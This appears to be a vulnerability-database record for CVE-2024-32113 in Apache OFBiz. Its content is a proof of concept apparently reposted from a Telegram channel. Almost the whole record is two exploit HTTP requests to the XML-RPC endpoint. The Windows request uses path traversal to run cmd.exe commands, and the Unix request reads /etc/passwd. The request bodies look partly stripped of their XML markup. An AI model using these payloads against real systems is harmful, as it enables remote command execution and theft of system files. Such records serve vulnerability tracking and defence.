{"uuid": "e6493a99-5663-4672-9082-b495d7ec5e8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/CivilityBreaches/347", "content": "CVE-2024-32113 Apache-OFBiz\n*\nPOC \u0434\u043b\u044f WIN\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  performCommand\n  \n    \n      ../../../../../../windows/system32/cmd.exe?/c+dir+c:\\\n    \n  \n\n\nPOC \u0434\u043b\u044f *NIX\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  example.createBlogPost\n  \n    \n      ../../../../../../etc/passwd\n    \n  \n", "creation_timestamp": "2024-05-21T12:02:35.000000Z"}